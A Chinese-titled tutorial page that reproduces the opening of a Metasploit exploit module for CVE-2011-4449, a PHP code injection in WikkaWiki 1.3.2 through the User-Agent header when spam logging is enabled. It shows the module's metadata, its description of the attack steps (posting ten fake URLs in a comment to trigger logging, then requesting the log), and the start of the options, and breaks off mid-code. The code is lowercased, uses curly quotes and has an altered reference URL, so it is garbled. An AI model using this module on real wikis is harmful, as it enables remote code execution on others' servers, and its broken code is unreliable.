word技术学习文档：WikkaWiki 1.3.2 Spam Logging PHP注射的方法

##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##
require ‘msf/core’
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
def initialize(info={})
super(update_info(info,
‘name’ => “wikkawiki 1.3.2 spam logging php injection”,
‘description’ => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as ‘page’.
},
‘license’ => msf_license,
‘author’ =>
[
‘egix’, #initial discovery, poc
‘sinn3r’ #metasploit
],
‘references’ =>
[
[‘cve’, ‘2011-4449’],
[‘osvdb’, ‘77391’],
[‘edb’, ‘18177’],
[‘url’, ‘https:// www.jb51.net /trac/wikka/ticket/1098’]
],
‘payload’ =>
{
‘badchars’ => “x00”
},
‘defaultoptions’ =>
{
‘exitfunction’ => “none”
},
‘arch’ => arch_php,
‘platform’ => [‘php’],
‘targets’ =>
[
[‘wikkawiki 1.3.2 r1814’, {}]
],
‘privileged’ => false,
‘disclosuredate’ => “nov 30 2011”,
‘defaulttarget’ => 0))
register_options(
[
optstring.new(‘username’, [true, ‘wikkawiki username’]),
optstring.new(‘password’, [true,